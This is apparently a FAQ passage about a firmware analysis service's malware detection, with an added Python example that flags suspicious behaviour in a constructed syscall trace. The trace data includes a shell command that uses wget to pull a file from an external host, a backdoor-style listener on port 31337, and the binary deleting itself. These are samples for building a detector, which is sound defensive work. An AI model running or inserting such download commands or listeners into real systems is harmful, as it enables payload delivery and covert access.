Each vulnerability is classified using CVE, reporting the most important vulnerabilities together with their Exploits. Each Exploit provides a script for verifying whether the firmware is exposed or not. Since Firmware Reviewer never accesses physical devices, it is up to you to execute the tests on your own devices.

Q. How is Malware detected?

Malware is detected using an embedded version of Metasploit against our own collection of rules, as well as through dynamic analysis of ELF files, which records:

  1. Starting and Termination: Time Stamps and Elapsed Time.

  2. Processes Information: clone, exec and exit etc.

  3. File I/O: open, read, write and delete etc.

  4. Network: TCP, UDP, HTTP and HTTPS etc.

  5. Typical Malicious Actions: self deletion, modification and lock.

  6. API Information: getpid, system, dup and other libc functions.

  7. syscall sequences.

In addition, our Dynamic Analysis finds backdoors based on: suspicious open TCP ports, suspicious connections to external IPs and URIs, the presence of non-standard services and suspicious executables.
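As an added example (not Firmware Reviewer's own code), the Python below applies rules of the kind listed above to a process trace recorded during an emulated run: self-deletion of the executable, a shell spawned with -c, a connection to an external IP, and a listener opened on a TCP port the device is not supposed to serve. The trace is constructed in strace-like form, the binary path /usr/bin/httpd and the expected-port list are assumptions for the example, and failed syscalls (negative return) are ignored because they never took effect.

```python
"""Added example, not Firmware Reviewer code: rules over a process trace
captured from an emulated firmware run, covering the indicators listed
above (self-deletion, shell spawned via -c, connections to external IPs,
listeners on unexpected TCP ports).  The trace is constructed in
strace-like form; the expected-port list is an assumption about the device."""
import ipaddress
import re

EXE = "/usr/bin/httpd"   # the binary under analysis (constructed)

# Constructed trace: one syscall per line, strace style.
TRACE = '''\
execve("/usr/bin/httpd", ["/usr/bin/httpd"], 0x7ffd) = 0
openat(AT_FDCWD, "/etc/httpd.conf", O_RDONLY) = 3
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
bind(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(4, 128) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 5
bind(5, {sa_family=AF_INET, sin_port=htons(31337), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(5, 5) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 6
connect(6, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("203.0.113.50")}, 16) = 0
connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = -1 ENETUNREACH
unlink("/usr/bin/httpd") = 0
execve("/bin/sh", ["sh", "-c", "wget http://203.0.113.50/x -O /tmp/x"], 0x7ffd) = 0
'''

# Ports the device is documented to expose (assumption for this example).
EXPECTED_PORTS = {22, 80, 443}

LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "0.0.0.0/8")]

SYSCALL_RE = re.compile(r"^(\w+)\((.*)\)\s*=\s*(-?\d+)")
PORT_RE = re.compile(r"htons\((\d+)\)")
ADDR_RE = re.compile(r'inet_addr\("([\d.]+)"\)')
SHELL_CMD_RE = re.compile(r'"/bin/(?:ba)?sh".*?"-c",\s*"([^"]*)"')


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in LOCAL_NETS)


def analyze_trace(trace, exe, expected_ports=EXPECTED_PORTS):
    """Return findings as (rule, detail) in trace order.  A listener is only
    reported after listen() on a socket previously bound to an unexpected
    port, so a client that merely bind()s a source port is not flagged."""
    findings = []
    bound_port = {}               # fd -> port from a successful bind()
    for line in trace.splitlines():
        m = SYSCALL_RE.match(line)
        if not m:
            continue
        name, args, ret = m.group(1), m.group(2), int(m.group(3))
        if ret < 0:
            continue              # failed calls never took effect
        fd = args.split(",")[0].strip()
        if name == "bind":
            bound_port[fd] = int(PORT_RE.search(args).group(1))
        elif name == "listen":
            port = bound_port.get(fd)
            if port is not None and port not in expected_ports:
                findings.append(("unexpected-listener", port))
        elif name == "connect":
            ip = ADDR_RE.search(args).group(1)
            if is_external(ip):
                findings.append(("external-connection", ip))
        elif name in ("unlink", "unlinkat") and f'"{exe}"' in args:
            findings.append(("self-deletion", exe))
        elif name == "execve":
            cmd = SHELL_CMD_RE.search(args)
            if cmd:
                findings.append(("shell-command", cmd.group(1)))
    return findings


if __name__ == "__main__":
    for rule, detail in analyze_trace(TRACE, EXE):
        print(f"{rule}: {detail}")
```

The bind/listen pairing is the small piece of syscall-sequence reasoning worth copying: a port is only a "suspicious open TCP port" once listen() succeeds on the descriptor that bind() attached it to, and the failed connect() to 8.8.8.8 produces nothing because the kernel rejected it.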